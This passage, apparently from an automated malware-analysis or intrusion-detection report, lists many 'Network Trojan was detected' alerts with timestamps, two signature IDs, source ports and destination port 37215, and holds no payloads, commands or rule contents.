          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292321
          SID:2829579
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413153
          SID:2829579
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719309
          SID:2829579
          Source Port:51036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930339
          SID:2835222
          Source Port:56604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223945
          SID:2835222
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080663
          SID:2835222
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225322
          SID:2829579
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477459
          SID:2829579
          Source Port:54204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692131
          SID:2829579
          Source Port:43810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900136
          SID:2835222
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163372
          SID:2835222
          Source Port:47508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914412
          SID:2835222
          Source Port:45720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398683
          SID:2835222
          Source Port:51956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865047
          SID:2829579
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465365
          SID:2829579
          Source Port:53490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161803
          SID:2835222
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223576
          SID:2829579
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014862
          SID:2829579
          Source Port:41748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861340
          SID:2829579
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249650
          SID:2835222
          Source Port:49104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275583
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082185
          SID:2829579
          Source Port:49648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714385
          SID:2835222
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080120
          SID:2829579
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644976
          SID:2829579
          Source Port:51200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088557
          SID:2829579
          Source Port:36890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923028
          SID:2835222
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2829579
          Source Port:52144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418753
          SID:2835222
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987530
          SID:2829579
          Source Port:56214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715731
          SID:2835222
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921135
          SID:2829579
          Source Port:38982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644717
          SID:2829579
          Source Port:54880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870712
          SID:2829579
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245566
          SID:2829579
          Source Port:49602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645351
          SID:2829579
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414143
          SID:2835222
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028282
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357456
          SID:2835222
          Source Port:48470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718068
          SID:2829579
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163439
          SID:2835222
          Source Port:39732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633988
          SID:2829579
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031977
          SID:2829579
          Source Port:50214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414606
          SID:2835222
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465465
          SID:2835222
          Source Port:43600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277285
          SID:2835222
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715381
          SID:2835222
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.096015
          SID:2829579
          Source Port:57958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592713
          SID:2835222
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164299
          SID:2835222
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273734
          SID:2835222
          Source Port:33070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821170
          SID:2829579
          Source Port:51546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224998
          SID:2835222
          Source Port:54038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597373
          SID:2829579
          Source Port:49594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131620
          SID:2829579
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892838
          SID:2829579
          Source Port:33676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600417
          SID:2835222
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564869
          SID:2835222
          Source Port:53002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074536
          SID:2829579
          Source Port:47588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948771
          SID:2835222
          Source Port:44070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910466
          SID:2829579
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909300
          SID:2835222
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951651
          SID:2829579
          Source Port:53892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251407
          SID:2829579
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947831
          SID:2835222
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718133
          SID:2829579
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398181
          SID:2835222
          Source Port:39796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667881
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269137
          SID:2829579
          Source Port:44298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411972
          SID:2829579
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417911
          SID:2829579
          Source Port:35456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635982
          SID:2829579
          Source Port:36626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103444
          SID:2829579
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713635
          SID:2829579
          Source Port:38990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714296
          SID:2835222
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996184
          SID:2829579
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033112
          SID:2835222
          Source Port:40034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037893
          SID:2829579
          Source Port:36430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226149
          SID:2835222
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719609
          SID:2829579
          Source Port:56782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227664
          SID:2829579
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473689
          SID:2829579
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820324
          SID:2829579
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474725
          SID:2829579
          Source Port:49816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163414
          SID:2829579
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075408
          SID:2829579
          Source Port:50256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698499
          SID:2829579
          Source Port:52396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559005
          SID:2835222
          Source Port:56330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645069
          SID:2835222
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719270
          SID:2835222
          Source Port:45400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296690
          SID:2835222
          Source Port:52392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119692
          SID:2829579
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041422
          SID:2829579
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567393
          SID:2829579
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284029
          SID:2829579
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414393
          SID:2829579
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644728
          SID:2835222
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162614
          SID:2829579
          Source Port:50902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395861
          SID:2835222
          Source Port:55220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082659
          SID:2829579
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946211
          SID:2835222
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914595
          SID:2835222
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644598
          SID:2829579
          Source Port:38664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719130
          SID:2829579
          Source Port:50302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169780
          SID:2835222
          Source Port:46396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993480
          SID:2829579
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926938
          SID:2835222
          Source Port:51784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472256
          SID:2829579
          Source Port:53666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032943
          SID:2835222
          Source Port:60668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867805
          SID:2835222
          Source Port:36592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222743
          SID:2829579
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719175
          SID:2829579
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067225
          SID:2829579
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241901
          SID:2829579
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993584
          SID:2829579
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606826
          SID:2835222
          Source Port:47378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227263
          SID:2835222
          Source Port:41512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950324
          SID:2835222
          Source Port:46696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166212
          SID:2835222
          Source Port:41786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951234
          SID:2829579
          Source Port:40006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920044
          SID:2829579
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397637
          SID:2829579
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223322
          SID:2835222
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595897
          SID:2829579
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661595
          SID:2829579
          Source Port:50640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230130
          SID:2835222
          Source Port:47440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272833
          SID:2829579
          Source Port:38140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.122685
          SID:2829579
          Source Port:43536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033033
          SID:2829579
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242724
          SID:2829579
          Source Port:45022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416245
          SID:2829579
          Source Port:52410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947669
          SID:2835222
          Source Port:39712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601078
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206177
          SID:2829579
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129637
          SID:2835222
          Source Port:52680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160246
          SID:2835222
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033108
          SID:2829579
          Source Port:53448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205519
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986705
          SID:2829579
          Source Port:53748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119883
          SID:2835222
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399359
          SID:2829579
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162567
          SID:2835222
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558179
          SID:2835222
          Source Port:59580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918114
          SID:2829579
          Source Port:53466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986676
          SID:2829579
          Source Port:37072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818694
          SID:2835222
          Source Port:45440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914156
          SID:2835222
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080569
          SID:2835222
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942079
          SID:2835222
          Source Port:40068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000887
          SID:2835222
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537962
          SID:2829579
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929276
          SID:2829579
          Source Port:47140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560642
          SID:2835222
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916982
          SID:2829579
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205852
          SID:2835222
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030577
          SID:2835222
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290196
          SID:2829579
          Source Port:48062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724145
          SID:2835222
          Source Port:40754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248262
          SID:2835222
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.015040
          SID:2835222
          Source Port:37066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302145
          SID:2835222
          Source Port:41008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413530
          SID:2829579
          Source Port:58326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396677
          SID:2829579
          Source Port:55950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155848
          SID:2835222
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035036
          SID:2835222
          Source Port:58162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399049
          SID:2829579
          Source Port:50590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477475
          SID:2835222
          Source Port:35398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104261
          SID:2829579
          Source Port:54596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819791
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078835
          SID:2829579
          Source Port:43594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718297
          SID:2835222
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564828
          SID:2835222
          Source Port:45434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253230
          SID:2829579
          Source Port:47106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715082
          SID:2835222
          Source Port:40960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416285
          SID:2829579
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289012
          SID:2835222
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287003
          SID:2829579
          Source Port:39582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819142
          SID:2835222
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988601
          SID:2829579
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298250
          SID:2835222
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914339
          SID:2829579
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008242
          SID:2829579
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419087
          SID:2835222
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027093
          SID:2835222
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692095
          SID:2829579
          Source Port:54654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716609
          SID:2829579
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284131
          SID:2829579
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682192
          SID:2829579
          Source Port:60736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037078
          SID:2829579
          Source Port:57744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468344
          SID:2829579
          Source Port:49440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475789
          SID:2835222
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724334
          SID:2829579
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298102
          SID:2835222
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604907
          SID:2829579
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819012
          SID:2835222
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412891
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565054
          SID:2835222
          Source Port:33466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
